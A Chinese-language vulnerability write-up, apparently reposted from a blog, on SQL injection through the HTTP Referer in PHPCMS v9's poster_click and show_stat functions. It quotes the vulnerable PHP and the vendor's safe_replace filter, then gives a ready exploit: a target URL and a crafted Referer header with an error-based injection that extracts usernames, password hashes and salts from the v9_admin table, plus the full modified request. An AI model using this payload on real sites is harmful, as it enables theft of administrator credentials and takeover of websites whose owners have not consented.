from:http://huakai.paxmac.org/?p=522
360报告了该漏洞,地址:http://webscan.360.cn/news/news84,重要部分被打上了马赛克,根据分析漏洞,给出利用方法。
上面说的很详细了,由于poster_click函数在插入数据库的时候,没对http-referer做过滤,然后产生了注入。
public function poster_click() { $id = isset($_GET['id']) ? intval($_GET['id']) : 0; $r = $this->db->get_one(array('id'=>$id)); if (!is_array($r) && empty($r)) return false; $ip_area = pc_base::load_sys_class('ip_area'); $ip = ip(); $area = $ip_area->get($ip); $username = param::get_cookie('username') ? param::get_cookie('username') : ''; if($id) { $siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid(); $this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1)); } $this->db->update(array('clicks'=>'+=1'), array('id'=>$id)); $setting = string2array($r['setting']); if (count($setting)==1) { $url = $setting['1']['linkurl']; } else { $url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl']; } header('Location: '.$url); }
在show_stat函数中同样出现了问题
protected function show_stat($siteid = 0, $spaceid = 0, $id = 0) { $M = new_html_special_chars(getcache('poster', 'commons')); if($M['enablehits']==0) return true; //$siteid = intval($siteid); $spaceid = intval($spaceid); $id = intval($id); if(!$id) return false; if(!$siteid || !$spaceid) { $r = $this->db->get_one(array('id'=>$id), 'siteid, spaceid'); $siteid = $r['id']; $spaceid = $r['spaceid']; } $ip = ip(); $ip_area = pc_base::load_sys_class('ip_area'); $area = $ip_area->get($ip); $username = param::get_cookie('username') ? param::get_cookie('username') : ''; $this->db->update(array('hits'=>'+=1'), array('id'=>$id)); $this->s_db->insert(array('pid'=>$id, 'siteid'=>$siteid, 'spaceid'=>$spaceid, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=>0)); return true; } }
不过官方对这2个点都做了修复。
官方修复的方法:
safe_replace(HTTP_REFERER),对其进行了过滤。function safe_replace($string) { $string = str_replace('%20','',$string); $string = str_replace('%27','',$string); $string = str_replace('%2527','',$string); $string = str_replace('*','',$string); $string = str_replace('"','"',$string); $string = str_replace("'",'',$string); $string = str_replace('"','',$string); $string = str_replace(';','',$string); $string = str_replace('<','<',$string); $string = str_replace('>','>',$string); $string = str_replace("{",'',$string); $string = str_replace('}','',$string); $string = str_replace('//','',$string); return $string; }EXP:
http://www.0day5.com/index.php?m=poster&c=index&a=poster_click&id=1
Referer:http://www.0day5.com’,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#经过修改后的http head是这样的
Host: www.0day5.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: CNZZDATA2919850=cnzz_eid=97895523-1357654308-&ntime=1357654308&cnzz_a=0&retime=1357654307516&sin=<ime=1357654307516&rtime=0 Referer:http://www.0day5.com’,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论